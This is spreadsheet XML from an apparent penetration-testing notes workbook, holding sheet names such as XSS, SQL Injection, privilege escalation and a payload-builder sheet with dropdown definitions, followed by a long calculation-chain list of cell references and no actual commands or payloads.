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irgo\Desktop\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{8F0F960C-4C46-4D66-A647-E3713E114929}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-120" yWindow="-120" windowWidth="38640" windowHeight="21240" tabRatio="877" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="Commands" sheetId="25" r:id="rId1"/>
    <sheet name="Buffer Overflow 2" sheetId="48" r:id="rId2"/>
    <sheet name="Buffer overflow" sheetId="36" r:id="rId3"/>
    <sheet name="XSS" sheetId="46" r:id="rId4"/>
    <sheet name="SQL Injection" sheetId="45" r:id="rId5"/>
    <sheet name="Post Exploitation Process" sheetId="43" r:id="rId6"/>
    <sheet name="Port List" sheetId="39" r:id="rId7"/>
    <sheet name="Windows Privesc" sheetId="29" r:id="rId8"/>
    <sheet name="Linux Privesc" sheetId="32" r:id="rId9"/>
    <sheet name="Webapp" sheetId="33" r:id="rId10"/>
    <sheet name="Venom builder" sheetId="37" r:id="rId11"/>
    <sheet name="Environment preparation" sheetId="35" r:id="rId12"/>
    <sheet name="Reorder 'Category' slider" sheetId="27" r:id="rId13"/>
    <sheet name="NotionNotes URLS" sheetId="41" r:id="rId14"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">Commands!#REF!</definedName>
    <definedName name="DropDownList_Arch" comment="='Venom builder'!$P$52:INDEX('Venom builder'!$P$52:$P$53,MAX('Venom builder'!$O$52:$O$53),1)" localSheetId="10">'Venom builder'!$P$53:INDEX('Venom builder'!$P$53:$P$54,MAX('Venom builder'!$O$53:$O$54),1)</definedName>
    <definedName name="DropDownList_Encoder" comment="='Venom builder'!$L$52:INDEX('Venom builder'!$L$52:$L$617,MAX('Venom builder'!$K$52:$K$617),1)" localSheetId="10">'Venom builder'!$L$53:INDEX('Venom builder'!$L$53:$L$97,MAX('Venom builder'!$K$53:$K$97),1)</definedName>
    <definedName name="DropDownList_Format" comment="='Venom builder'!$T$53:INDEX('Venom builder'!$T$53:$T$104,MAX('Venom builder'!$S$53:$S$104),1)" localSheetId="10">'Venom builder'!$T$53:INDEX('Venom builder'!$T$53:$T$104,MAX('Venom builder'!$S$53:$S$104),1)</definedName>
    <definedName name="DropDownList_Payload" localSheetId="10">'Venom builder'!$D$53:INDEX('Venom builder'!$D$53:$D$618,MAX('Venom builder'!$C$53:$C$618),1)</definedName>
    <definedName name="DropDownList_Platforms" comment="='Venom builder'!$H$52:INDEX('Venom builder'!$H$52:$H$617,MAX('Venom builder'!$G$52:$G$617),1)" localSheetId="10">'Venom builder'!$H$53:INDEX('Venom builder'!$H$53:$H$84,MAX('Venom builder'!$G$53:$G$84),1)</definedName>
    <definedName name="Slicer_Category">#N/A</definedName>
    <definedName name="Slicer_Category_3">#N/A</definedName>
    <definedName name="Slicer_Intent">#N/A</definedName>
    <definedName name="Slicer_OS">#N/A</definedName>
    <definedName name="Slicer_Service">#N/A</definedName>
    <definedName name="Slicer_tool_lang">#N/A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4:slicerCache r:id="rId19"/>
        <x14:slicerCache r:id="rId2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18" i="37" l="1"/>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R104" i="37"/>
  <c r="B104" i="37"/>
  <c r="R103" i="37"/>
  <c r="B103" i="37"/>
  <c r="R102" i="37"/>
  <c r="B102" i="37"/>
  <c r="R101" i="37"/>
  <c r="B101" i="37"/>
  <c r="R100" i="37"/>
  <c r="B100" i="37"/>
  <c r="R99" i="37"/>
  <c r="B99" i="37"/>
  <c r="R98" i="37"/>
  <c r="B98" i="37"/>
  <c r="R97" i="37"/>
  <c r="J97" i="37"/>
  <c r="B97" i="37"/>
  <c r="R96" i="37"/>
  <c r="J96" i="37"/>
  <c r="B96" i="37"/>
  <c r="R95" i="37"/>
  <c r="J95" i="37"/>
  <c r="B95" i="37"/>
  <c r="R94" i="37"/>
  <c r="J94" i="37"/>
  <c r="B94" i="37"/>
  <c r="R93" i="37"/>
  <c r="J93" i="37"/>
  <c r="B93" i="37"/>
  <c r="R92" i="37"/>
  <c r="J92" i="37"/>
  <c r="B92" i="37"/>
  <c r="R91" i="37"/>
  <c r="J91" i="37"/>
  <c r="B91" i="37"/>
  <c r="R90" i="37"/>
  <c r="J90" i="37"/>
  <c r="B90" i="37"/>
  <c r="R89" i="37"/>
  <c r="J89" i="37"/>
  <c r="B89" i="37"/>
  <c r="R88" i="37"/>
  <c r="J88" i="37"/>
  <c r="B88" i="37"/>
  <c r="R87" i="37"/>
  <c r="J87" i="37"/>
  <c r="B87" i="37"/>
  <c r="R86" i="37"/>
  <c r="J86" i="37"/>
  <c r="B86" i="37"/>
  <c r="R85" i="37"/>
  <c r="J85" i="37"/>
  <c r="B85" i="37"/>
  <c r="R84" i="37"/>
  <c r="J84" i="37"/>
  <c r="F84" i="37"/>
  <c r="B84" i="37"/>
  <c r="R83" i="37"/>
  <c r="J83" i="37"/>
  <c r="F83" i="37"/>
  <c r="B83" i="37"/>
  <c r="R82" i="37"/>
  <c r="J82" i="37"/>
  <c r="F82" i="37"/>
  <c r="B82" i="37"/>
  <c r="R81" i="37"/>
  <c r="J81" i="37"/>
  <c r="F81" i="37"/>
  <c r="B81" i="37"/>
  <c r="R80" i="37"/>
  <c r="J80" i="37"/>
  <c r="F80" i="37"/>
  <c r="B80" i="37"/>
  <c r="R79" i="37"/>
  <c r="J79" i="37"/>
  <c r="F79" i="37"/>
  <c r="B79" i="37"/>
  <c r="R78" i="37"/>
  <c r="J78" i="37"/>
  <c r="F78" i="37"/>
  <c r="B78" i="37"/>
  <c r="R77" i="37"/>
  <c r="J77" i="37"/>
  <c r="F77" i="37"/>
  <c r="B77" i="37"/>
  <c r="R76" i="37"/>
  <c r="J76" i="37"/>
  <c r="F76" i="37"/>
  <c r="B76" i="37"/>
  <c r="R75" i="37"/>
  <c r="J75" i="37"/>
  <c r="F75" i="37"/>
  <c r="B75" i="37"/>
  <c r="R74" i="37"/>
  <c r="J74" i="37"/>
  <c r="F74" i="37"/>
  <c r="B74" i="37"/>
  <c r="R73" i="37"/>
  <c r="J73" i="37"/>
  <c r="F73" i="37"/>
  <c r="B73" i="37"/>
  <c r="R72" i="37"/>
  <c r="J72" i="37"/>
  <c r="F72" i="37"/>
  <c r="B72" i="37"/>
  <c r="R71" i="37"/>
  <c r="J71" i="37"/>
  <c r="F71" i="37"/>
  <c r="B71" i="37"/>
  <c r="R70" i="37"/>
  <c r="J70" i="37"/>
  <c r="F70" i="37"/>
  <c r="B70" i="37"/>
  <c r="R69" i="37"/>
  <c r="J69" i="37"/>
  <c r="F69" i="37"/>
  <c r="B69" i="37"/>
  <c r="R68" i="37"/>
  <c r="J68" i="37"/>
  <c r="F68" i="37"/>
  <c r="B68" i="37"/>
  <c r="R67" i="37"/>
  <c r="J67" i="37"/>
  <c r="F67" i="37"/>
  <c r="B67" i="37"/>
  <c r="R66" i="37"/>
  <c r="J66" i="37"/>
  <c r="F66" i="37"/>
  <c r="B66" i="37"/>
  <c r="R65" i="37"/>
  <c r="J65" i="37"/>
  <c r="F65" i="37"/>
  <c r="B65" i="37"/>
  <c r="R64" i="37"/>
  <c r="J64" i="37"/>
  <c r="F64" i="37"/>
  <c r="B64" i="37"/>
  <c r="R63" i="37"/>
  <c r="J63" i="37"/>
  <c r="F63" i="37"/>
  <c r="B63" i="37"/>
  <c r="R62" i="37"/>
  <c r="J62" i="37"/>
  <c r="F62" i="37"/>
  <c r="B62" i="37"/>
  <c r="R61" i="37"/>
  <c r="J61" i="37"/>
  <c r="F61" i="37"/>
  <c r="B61" i="37"/>
  <c r="R60" i="37"/>
  <c r="J60" i="37"/>
  <c r="F60" i="37"/>
  <c r="B60" i="37"/>
  <c r="R59" i="37"/>
  <c r="J59" i="37"/>
  <c r="F59" i="37"/>
  <c r="B59" i="37"/>
  <c r="R58" i="37"/>
  <c r="J58" i="37"/>
  <c r="F58" i="37"/>
  <c r="B58" i="37"/>
  <c r="R57" i="37"/>
  <c r="J57" i="37"/>
  <c r="F57" i="37"/>
  <c r="B57" i="37"/>
  <c r="R56" i="37"/>
  <c r="J56" i="37"/>
  <c r="F56" i="37"/>
  <c r="B56" i="37"/>
  <c r="R55" i="37"/>
  <c r="J55" i="37"/>
  <c r="F55" i="37"/>
  <c r="B55" i="37"/>
  <c r="R54" i="37"/>
  <c r="N54" i="37"/>
  <c r="J54" i="37"/>
  <c r="F54" i="37"/>
  <c r="B54" i="37"/>
  <c r="R53" i="37"/>
  <c r="S53" i="37" s="1"/>
  <c r="N53" i="37"/>
  <c r="O53" i="37" s="1"/>
  <c r="J53" i="37"/>
  <c r="K53" i="37" s="1"/>
  <c r="F53" i="37"/>
  <c r="G53" i="37" s="1"/>
  <c r="B53" i="37"/>
  <c r="C53" i="37" s="1"/>
  <c r="E9" i="27" a="1"/>
  <c r="E15" i="27" a="1"/>
  <c r="E27" i="27" a="1"/>
  <c r="E8" i="27" a="1"/>
  <c r="E22" i="27" a="1"/>
  <c r="E7" i="27" a="1"/>
  <c r="E39" i="27" a="1"/>
  <c r="E29" i="27" a="1"/>
  <c r="E12" i="27" a="1"/>
  <c r="E20" i="27" a="1"/>
  <c r="E17" i="27" a="1"/>
  <c r="E34" i="27" a="1"/>
  <c r="E13" i="27" a="1"/>
  <c r="E19" i="27" a="1"/>
  <c r="E38" i="27" a="1"/>
  <c r="E40" i="27" a="1"/>
  <c r="E28" i="27" a="1"/>
  <c r="E10" i="27" a="1"/>
  <c r="E36" i="27" a="1"/>
  <c r="E4" i="27" a="1"/>
  <c r="E35" i="27" a="1"/>
  <c r="E31" i="27" a="1"/>
  <c r="E23" i="27" a="1"/>
  <c r="E11" i="27" a="1"/>
  <c r="E32" i="27" a="1"/>
  <c r="E16" i="27" a="1"/>
  <c r="E24" i="27" a="1"/>
  <c r="E14" i="27" a="1"/>
  <c r="E6" i="27" a="1"/>
  <c r="E33" i="27" a="1"/>
  <c r="E3" i="27" a="1"/>
  <c r="E41" i="27" a="1"/>
  <c r="E21" i="27" a="1"/>
  <c r="E26" i="27" a="1"/>
  <c r="E30" i="27" a="1"/>
  <c r="E37" i="27" a="1"/>
  <c r="E25" i="27" a="1"/>
  <c r="E5" i="27" a="1"/>
  <c r="E18" i="27" a="1"/>
  <c r="E42" i="27" a="1"/>
  <c r="S54" i="37" l="1"/>
  <c r="S56" i="37"/>
  <c r="K54" i="37"/>
  <c r="G54" i="37"/>
  <c r="G59" i="37"/>
  <c r="S59" i="37"/>
  <c r="S62" i="37"/>
  <c r="S65" i="37"/>
  <c r="S74" i="37"/>
  <c r="S81" i="37"/>
  <c r="S57" i="37"/>
  <c r="S58" i="37"/>
  <c r="S60" i="37"/>
  <c r="S63" i="37"/>
  <c r="S66" i="37"/>
  <c r="S71" i="37"/>
  <c r="S75" i="37"/>
  <c r="S76" i="37"/>
  <c r="S79" i="37"/>
  <c r="S80" i="37"/>
  <c r="S82" i="37"/>
  <c r="S98" i="37"/>
  <c r="S102" i="37"/>
  <c r="S97" i="37"/>
  <c r="S73" i="37"/>
  <c r="S95" i="37"/>
  <c r="S104" i="37"/>
  <c r="S64" i="37"/>
  <c r="S94" i="37"/>
  <c r="S96" i="37"/>
  <c r="G56" i="37"/>
  <c r="K56" i="37"/>
  <c r="S86" i="37"/>
  <c r="S61" i="37"/>
  <c r="S90" i="37"/>
  <c r="S83" i="37"/>
  <c r="S87" i="37"/>
  <c r="S100" i="37"/>
  <c r="S91" i="37"/>
  <c r="S77" i="37"/>
  <c r="S101" i="37"/>
  <c r="S78" i="37"/>
  <c r="S88" i="37"/>
  <c r="S84" i="37"/>
  <c r="S72" i="37"/>
  <c r="S92" i="37"/>
  <c r="S85" i="37"/>
  <c r="S89" i="37"/>
  <c r="S93" i="37"/>
  <c r="S103" i="37"/>
  <c r="C76" i="37"/>
  <c r="C160" i="37"/>
  <c r="C304" i="37"/>
  <c r="C113" i="37"/>
  <c r="C161" i="37"/>
  <c r="C209" i="37"/>
  <c r="C257" i="37"/>
  <c r="C293" i="37"/>
  <c r="C341" i="37"/>
  <c r="C126" i="37"/>
  <c r="C162" i="37"/>
  <c r="C198" i="37"/>
  <c r="C210" i="37"/>
  <c r="C246" i="37"/>
  <c r="C282" i="37"/>
  <c r="C318" i="37"/>
  <c r="C366" i="37"/>
  <c r="C414" i="37"/>
  <c r="C86" i="37"/>
  <c r="C94" i="37"/>
  <c r="C104" i="37"/>
  <c r="C115" i="37"/>
  <c r="C139" i="37"/>
  <c r="C163" i="37"/>
  <c r="C187" i="37"/>
  <c r="C211" i="37"/>
  <c r="C235" i="37"/>
  <c r="C247" i="37"/>
  <c r="C271" i="37"/>
  <c r="C283" i="37"/>
  <c r="C295" i="37"/>
  <c r="C307" i="37"/>
  <c r="C331" i="37"/>
  <c r="C343" i="37"/>
  <c r="C355" i="37"/>
  <c r="C367" i="37"/>
  <c r="C379" i="37"/>
  <c r="C391" i="37"/>
  <c r="C403" i="37"/>
  <c r="C415" i="37"/>
  <c r="C427" i="37"/>
  <c r="C439" i="37"/>
  <c r="C451" i="37"/>
  <c r="C463" i="37"/>
  <c r="C475" i="37"/>
  <c r="C487" i="37"/>
  <c r="C499" i="37"/>
  <c r="C511" i="37"/>
  <c r="C523" i="37"/>
  <c r="C535" i="37"/>
  <c r="C547" i="37"/>
  <c r="C82" i="37"/>
  <c r="C172" i="37"/>
  <c r="C328" i="37"/>
  <c r="C103" i="37"/>
  <c r="C149" i="37"/>
  <c r="C197" i="37"/>
  <c r="C245" i="37"/>
  <c r="C305" i="37"/>
  <c r="C353" i="37"/>
  <c r="C150" i="37"/>
  <c r="C186" i="37"/>
  <c r="C234" i="37"/>
  <c r="C270" i="37"/>
  <c r="C306" i="37"/>
  <c r="C342" i="37"/>
  <c r="C426" i="37"/>
  <c r="C90" i="37"/>
  <c r="C98" i="37"/>
  <c r="C127" i="37"/>
  <c r="C151" i="37"/>
  <c r="C175" i="37"/>
  <c r="C199" i="37"/>
  <c r="C223" i="37"/>
  <c r="C259" i="37"/>
  <c r="C319" i="37"/>
  <c r="C559" i="37"/>
  <c r="C55" i="37"/>
  <c r="C79" i="37"/>
  <c r="C232" i="37"/>
  <c r="C99" i="37"/>
  <c r="C153" i="37"/>
  <c r="C201" i="37"/>
  <c r="C237" i="37"/>
  <c r="C285" i="37"/>
  <c r="C297" i="37"/>
  <c r="C309" i="37"/>
  <c r="C321" i="37"/>
  <c r="C333" i="37"/>
  <c r="C345" i="37"/>
  <c r="C357" i="37"/>
  <c r="C369" i="37"/>
  <c r="C381" i="37"/>
  <c r="C393" i="37"/>
  <c r="C405" i="37"/>
  <c r="C417" i="37"/>
  <c r="C429" i="37"/>
  <c r="C441" i="37"/>
  <c r="C453" i="37"/>
  <c r="C465" i="37"/>
  <c r="C477" i="37"/>
  <c r="C489" i="37"/>
  <c r="C501" i="37"/>
  <c r="C513" i="37"/>
  <c r="C525" i="37"/>
  <c r="C537" i="37"/>
  <c r="C549" i="37"/>
  <c r="C561" i="37"/>
  <c r="C573" i="37"/>
  <c r="C585" i="37"/>
  <c r="C597" i="37"/>
  <c r="C97" i="37"/>
  <c r="C244" i="37"/>
  <c r="C141" i="37"/>
  <c r="C225" i="37"/>
  <c r="C118" i="37"/>
  <c r="C190" i="37"/>
  <c r="C250" i="37"/>
  <c r="C310" i="37"/>
  <c r="C370" i="37"/>
  <c r="C382" i="37"/>
  <c r="C442" i="37"/>
  <c r="C454" i="37"/>
  <c r="C466" i="37"/>
  <c r="C478" i="37"/>
  <c r="C490" i="37"/>
  <c r="C502" i="37"/>
  <c r="C514" i="37"/>
  <c r="C526" i="37"/>
  <c r="C538" i="37"/>
  <c r="C550" i="37"/>
  <c r="C562" i="37"/>
  <c r="C574" i="37"/>
  <c r="C586" i="37"/>
  <c r="C598" i="37"/>
  <c r="C67" i="37"/>
  <c r="C124" i="37"/>
  <c r="C280" i="37"/>
  <c r="C129" i="37"/>
  <c r="C213" i="37"/>
  <c r="C54" i="37"/>
  <c r="C106" i="37"/>
  <c r="C178" i="37"/>
  <c r="C238" i="37"/>
  <c r="C298" i="37"/>
  <c r="C358" i="37"/>
  <c r="C394" i="37"/>
  <c r="C131" i="37"/>
  <c r="C191" i="37"/>
  <c r="C239" i="37"/>
  <c r="C287" i="37"/>
  <c r="C335" i="37"/>
  <c r="C383" i="37"/>
  <c r="C431" i="37"/>
  <c r="C443" i="37"/>
  <c r="C455" i="37"/>
  <c r="C503" i="37"/>
  <c r="C515" i="37"/>
  <c r="C527" i="37"/>
  <c r="C539" i="37"/>
  <c r="C551" i="37"/>
  <c r="C563" i="37"/>
  <c r="C575" i="37"/>
  <c r="C587" i="37"/>
  <c r="C599" i="37"/>
  <c r="C70" i="37"/>
  <c r="C148" i="37"/>
  <c r="C256" i="37"/>
  <c r="C117" i="37"/>
  <c r="C189" i="37"/>
  <c r="C261" i="37"/>
  <c r="C87" i="37"/>
  <c r="C130" i="37"/>
  <c r="C166" i="37"/>
  <c r="C226" i="37"/>
  <c r="C286" i="37"/>
  <c r="C346" i="37"/>
  <c r="C406" i="37"/>
  <c r="C100" i="37"/>
  <c r="C143" i="37"/>
  <c r="C167" i="37"/>
  <c r="C203" i="37"/>
  <c r="C275" i="37"/>
  <c r="C323" i="37"/>
  <c r="C371" i="37"/>
  <c r="C419" i="37"/>
  <c r="C491" i="37"/>
  <c r="C63" i="37"/>
  <c r="C69" i="37"/>
  <c r="C75" i="37"/>
  <c r="C81" i="37"/>
  <c r="C120" i="37"/>
  <c r="C132" i="37"/>
  <c r="C144" i="37"/>
  <c r="C168" i="37"/>
  <c r="C192" i="37"/>
  <c r="C204" i="37"/>
  <c r="C216" i="37"/>
  <c r="C228" i="37"/>
  <c r="C240" i="37"/>
  <c r="C252" i="37"/>
  <c r="C264" i="37"/>
  <c r="C276" i="37"/>
  <c r="C288" i="37"/>
  <c r="C300" i="37"/>
  <c r="C312" i="37"/>
  <c r="C324" i="37"/>
  <c r="C336" i="37"/>
  <c r="C348" i="37"/>
  <c r="C360" i="37"/>
  <c r="C372" i="37"/>
  <c r="C384" i="37"/>
  <c r="C396" i="37"/>
  <c r="C408" i="37"/>
  <c r="C64" i="37"/>
  <c r="C136" i="37"/>
  <c r="C268" i="37"/>
  <c r="C165" i="37"/>
  <c r="C273" i="37"/>
  <c r="C95" i="37"/>
  <c r="C154" i="37"/>
  <c r="C202" i="37"/>
  <c r="C262" i="37"/>
  <c r="C322" i="37"/>
  <c r="C430" i="37"/>
  <c r="C119" i="37"/>
  <c r="C179" i="37"/>
  <c r="C227" i="37"/>
  <c r="C263" i="37"/>
  <c r="C311" i="37"/>
  <c r="C359" i="37"/>
  <c r="C407" i="37"/>
  <c r="C467" i="37"/>
  <c r="C57" i="37"/>
  <c r="C66" i="37"/>
  <c r="C78" i="37"/>
  <c r="C108" i="37"/>
  <c r="C180" i="37"/>
  <c r="C420" i="37"/>
  <c r="C58" i="37"/>
  <c r="C93" i="37"/>
  <c r="C220" i="37"/>
  <c r="C105" i="37"/>
  <c r="C177" i="37"/>
  <c r="C249" i="37"/>
  <c r="C91" i="37"/>
  <c r="C142" i="37"/>
  <c r="C214" i="37"/>
  <c r="C274" i="37"/>
  <c r="C334" i="37"/>
  <c r="C418" i="37"/>
  <c r="C107" i="37"/>
  <c r="C155" i="37"/>
  <c r="C215" i="37"/>
  <c r="C251" i="37"/>
  <c r="C299" i="37"/>
  <c r="C347" i="37"/>
  <c r="C395" i="37"/>
  <c r="C479" i="37"/>
  <c r="C60" i="37"/>
  <c r="C72" i="37"/>
  <c r="C84" i="37"/>
  <c r="C156" i="37"/>
  <c r="C432" i="37"/>
  <c r="C61" i="37"/>
  <c r="C112" i="37"/>
  <c r="C102" i="37"/>
  <c r="C111" i="37"/>
  <c r="C123" i="37"/>
  <c r="C135" i="37"/>
  <c r="C147" i="37"/>
  <c r="C159" i="37"/>
  <c r="C171" i="37"/>
  <c r="C183" i="37"/>
  <c r="C195" i="37"/>
  <c r="C207" i="37"/>
  <c r="C219" i="37"/>
  <c r="C231" i="37"/>
  <c r="C243" i="37"/>
  <c r="C255" i="37"/>
  <c r="C267" i="37"/>
  <c r="C279" i="37"/>
  <c r="C291" i="37"/>
  <c r="C303" i="37"/>
  <c r="C315" i="37"/>
  <c r="C327" i="37"/>
  <c r="C339" i="37"/>
  <c r="C351" i="37"/>
  <c r="C363" i="37"/>
  <c r="C375" i="37"/>
  <c r="C387" i="37"/>
  <c r="C399" i="37"/>
  <c r="C411" i="37"/>
  <c r="C423" i="37"/>
  <c r="C435" i="37"/>
  <c r="C447" i="37"/>
  <c r="C459" i="37"/>
  <c r="C471" i="37"/>
  <c r="C483" i="37"/>
  <c r="C495" i="37"/>
  <c r="C507" i="37"/>
  <c r="C519" i="37"/>
  <c r="C531" i="37"/>
  <c r="C543" i="37"/>
  <c r="C555" i="37"/>
  <c r="C85" i="37"/>
  <c r="C196" i="37"/>
  <c r="C292" i="37"/>
  <c r="C340" i="37"/>
  <c r="C364" i="37"/>
  <c r="C376" i="37"/>
  <c r="C388" i="37"/>
  <c r="C400" i="37"/>
  <c r="C412" i="37"/>
  <c r="C424" i="37"/>
  <c r="C436" i="37"/>
  <c r="C448" i="37"/>
  <c r="C460" i="37"/>
  <c r="C472" i="37"/>
  <c r="C484" i="37"/>
  <c r="C496" i="37"/>
  <c r="C508" i="37"/>
  <c r="C520" i="37"/>
  <c r="C532" i="37"/>
  <c r="C544" i="37"/>
  <c r="C556" i="37"/>
  <c r="C568" i="37"/>
  <c r="C580" i="37"/>
  <c r="C592" i="37"/>
  <c r="C604" i="37"/>
  <c r="C89" i="37"/>
  <c r="C208" i="37"/>
  <c r="C316" i="37"/>
  <c r="C137" i="37"/>
  <c r="C185" i="37"/>
  <c r="C233" i="37"/>
  <c r="C281" i="37"/>
  <c r="C317" i="37"/>
  <c r="C365" i="37"/>
  <c r="C377" i="37"/>
  <c r="C389" i="37"/>
  <c r="C401" i="37"/>
  <c r="C413" i="37"/>
  <c r="C425" i="37"/>
  <c r="C437" i="37"/>
  <c r="C449" i="37"/>
  <c r="C461" i="37"/>
  <c r="C473" i="37"/>
  <c r="C485" i="37"/>
  <c r="C497" i="37"/>
  <c r="C509" i="37"/>
  <c r="C521" i="37"/>
  <c r="C533" i="37"/>
  <c r="C545" i="37"/>
  <c r="C557" i="37"/>
  <c r="C569" i="37"/>
  <c r="C581" i="37"/>
  <c r="C593" i="37"/>
  <c r="C605" i="37"/>
  <c r="C73" i="37"/>
  <c r="C184" i="37"/>
  <c r="C352" i="37"/>
  <c r="C125" i="37"/>
  <c r="C173" i="37"/>
  <c r="C221" i="37"/>
  <c r="C269" i="37"/>
  <c r="C329" i="37"/>
  <c r="C114" i="37"/>
  <c r="C138" i="37"/>
  <c r="C174" i="37"/>
  <c r="C222" i="37"/>
  <c r="C258" i="37"/>
  <c r="C294" i="37"/>
  <c r="C330" i="37"/>
  <c r="C378" i="37"/>
  <c r="C390" i="37"/>
  <c r="C402" i="37"/>
  <c r="C438" i="37"/>
  <c r="C450" i="37"/>
  <c r="C462" i="37"/>
  <c r="C474" i="37"/>
  <c r="C486" i="37"/>
  <c r="C498" i="37"/>
  <c r="C510" i="37"/>
  <c r="C522" i="37"/>
  <c r="C534" i="37"/>
  <c r="C546" i="37"/>
  <c r="C558" i="37"/>
  <c r="C570" i="37"/>
  <c r="C582" i="37"/>
  <c r="C594" i="37"/>
  <c r="C606" i="37"/>
  <c r="C607" i="37"/>
  <c r="C571" i="37"/>
  <c r="C583" i="37"/>
  <c r="C595" i="37"/>
  <c r="C56" i="37"/>
  <c r="C59" i="37"/>
  <c r="C62" i="37"/>
  <c r="C65" i="37"/>
  <c r="C68" i="37"/>
  <c r="C71" i="37"/>
  <c r="C74" i="37"/>
  <c r="C77" i="37"/>
  <c r="C80" i="37"/>
  <c r="C83" i="37"/>
  <c r="C116" i="37"/>
  <c r="C128" i="37"/>
  <c r="C140" i="37"/>
  <c r="C152" i="37"/>
  <c r="C164" i="37"/>
  <c r="C176" i="37"/>
  <c r="C188" i="37"/>
  <c r="C200" i="37"/>
  <c r="C212" i="37"/>
  <c r="C224" i="37"/>
  <c r="C236" i="37"/>
  <c r="C248" i="37"/>
  <c r="C260" i="37"/>
  <c r="C272" i="37"/>
  <c r="C284" i="37"/>
  <c r="C296" i="37"/>
  <c r="C308" i="37"/>
  <c r="C320" i="37"/>
  <c r="C332" i="37"/>
  <c r="C344" i="37"/>
  <c r="C356" i="37"/>
  <c r="C368" i="37"/>
  <c r="C380" i="37"/>
  <c r="C392" i="37"/>
  <c r="C404" i="37"/>
  <c r="C416" i="37"/>
  <c r="C428" i="37"/>
  <c r="C440" i="37"/>
  <c r="C452" i="37"/>
  <c r="C464" i="37"/>
  <c r="C476" i="37"/>
  <c r="C488" i="37"/>
  <c r="C500" i="37"/>
  <c r="C512" i="37"/>
  <c r="C524" i="37"/>
  <c r="C536" i="37"/>
  <c r="C548" i="37"/>
  <c r="C560" i="37"/>
  <c r="C572" i="37"/>
  <c r="C584" i="37"/>
  <c r="C596" i="37"/>
  <c r="C608" i="37"/>
  <c r="C609" i="37"/>
  <c r="C610" i="37"/>
  <c r="C611" i="37"/>
  <c r="C444" i="37"/>
  <c r="C480" i="37"/>
  <c r="C516" i="37"/>
  <c r="C576" i="37"/>
  <c r="C612" i="37"/>
  <c r="C456" i="37"/>
  <c r="C492" i="37"/>
  <c r="C528" i="37"/>
  <c r="C540" i="37"/>
  <c r="C552" i="37"/>
  <c r="C588" i="37"/>
  <c r="C88" i="37"/>
  <c r="C101" i="37"/>
  <c r="C133" i="37"/>
  <c r="C157" i="37"/>
  <c r="C181" i="37"/>
  <c r="C205" i="37"/>
  <c r="C217" i="37"/>
  <c r="C289" i="37"/>
  <c r="C613" i="37"/>
  <c r="C468" i="37"/>
  <c r="C504" i="37"/>
  <c r="C564" i="37"/>
  <c r="C600" i="37"/>
  <c r="C92" i="37"/>
  <c r="C96" i="37"/>
  <c r="C109" i="37"/>
  <c r="C121" i="37"/>
  <c r="C145" i="37"/>
  <c r="C169" i="37"/>
  <c r="C193" i="37"/>
  <c r="C229" i="37"/>
  <c r="C241" i="37"/>
  <c r="C253" i="37"/>
  <c r="C265" i="37"/>
  <c r="C277" i="37"/>
  <c r="C301" i="37"/>
  <c r="C313" i="37"/>
  <c r="C325" i="37"/>
  <c r="C337" i="37"/>
  <c r="C349" i="37"/>
  <c r="C361" i="37"/>
  <c r="C373" i="37"/>
  <c r="C385" i="37"/>
  <c r="C397" i="37"/>
  <c r="C409" i="37"/>
  <c r="C421" i="37"/>
  <c r="C433" i="37"/>
  <c r="C445" i="37"/>
  <c r="C457" i="37"/>
  <c r="C469" i="37"/>
  <c r="C481" i="37"/>
  <c r="C493" i="37"/>
  <c r="C505" i="37"/>
  <c r="C517" i="37"/>
  <c r="C529" i="37"/>
  <c r="C541" i="37"/>
  <c r="C553" i="37"/>
  <c r="C565" i="37"/>
  <c r="C577" i="37"/>
  <c r="C589" i="37"/>
  <c r="C601" i="37"/>
  <c r="C110" i="37"/>
  <c r="C122" i="37"/>
  <c r="C134" i="37"/>
  <c r="C146" i="37"/>
  <c r="C158" i="37"/>
  <c r="C170" i="37"/>
  <c r="C182" i="37"/>
  <c r="C194" i="37"/>
  <c r="C206" i="37"/>
  <c r="C218" i="37"/>
  <c r="C230" i="37"/>
  <c r="C242" i="37"/>
  <c r="C254" i="37"/>
  <c r="C266" i="37"/>
  <c r="C278" i="37"/>
  <c r="C290" i="37"/>
  <c r="C302" i="37"/>
  <c r="C314" i="37"/>
  <c r="C326" i="37"/>
  <c r="C338" i="37"/>
  <c r="C350" i="37"/>
  <c r="C362" i="37"/>
  <c r="C374" i="37"/>
  <c r="C386" i="37"/>
  <c r="C398" i="37"/>
  <c r="C410" i="37"/>
  <c r="C422" i="37"/>
  <c r="C434" i="37"/>
  <c r="C446" i="37"/>
  <c r="C458" i="37"/>
  <c r="C470" i="37"/>
  <c r="C482" i="37"/>
  <c r="C494" i="37"/>
  <c r="C506" i="37"/>
  <c r="C518" i="37"/>
  <c r="C530" i="37"/>
  <c r="C542" i="37"/>
  <c r="C554" i="37"/>
  <c r="C566" i="37"/>
  <c r="C578" i="37"/>
  <c r="C590" i="37"/>
  <c r="C602" i="37"/>
  <c r="C614" i="37"/>
  <c r="C567" i="37"/>
  <c r="C579" i="37"/>
  <c r="C591" i="37"/>
  <c r="C603" i="37"/>
  <c r="C615" i="37"/>
  <c r="C616" i="37"/>
  <c r="C617" i="37"/>
  <c r="C618" i="37"/>
  <c r="G73" i="37"/>
  <c r="K85" i="37"/>
  <c r="K86" i="37"/>
  <c r="K94" i="37"/>
  <c r="G83" i="37"/>
  <c r="G71" i="37"/>
  <c r="G74" i="37"/>
  <c r="G77" i="37"/>
  <c r="G80" i="37"/>
  <c r="K97" i="37"/>
  <c r="K62" i="37"/>
  <c r="K95" i="37"/>
  <c r="K87" i="37"/>
  <c r="K91" i="37"/>
  <c r="G57" i="37"/>
  <c r="G76" i="37"/>
  <c r="G75" i="37"/>
  <c r="G78" i="37"/>
  <c r="G81" i="37"/>
  <c r="G84" i="37"/>
  <c r="G68" i="37"/>
  <c r="G69" i="37"/>
  <c r="K69" i="37"/>
  <c r="G65" i="37"/>
  <c r="K63" i="37"/>
  <c r="G63" i="37"/>
  <c r="G62" i="37"/>
  <c r="G72" i="37"/>
  <c r="G55" i="37"/>
  <c r="G58" i="37"/>
  <c r="G61" i="37"/>
  <c r="G79" i="37"/>
  <c r="K93" i="37"/>
  <c r="G67" i="37"/>
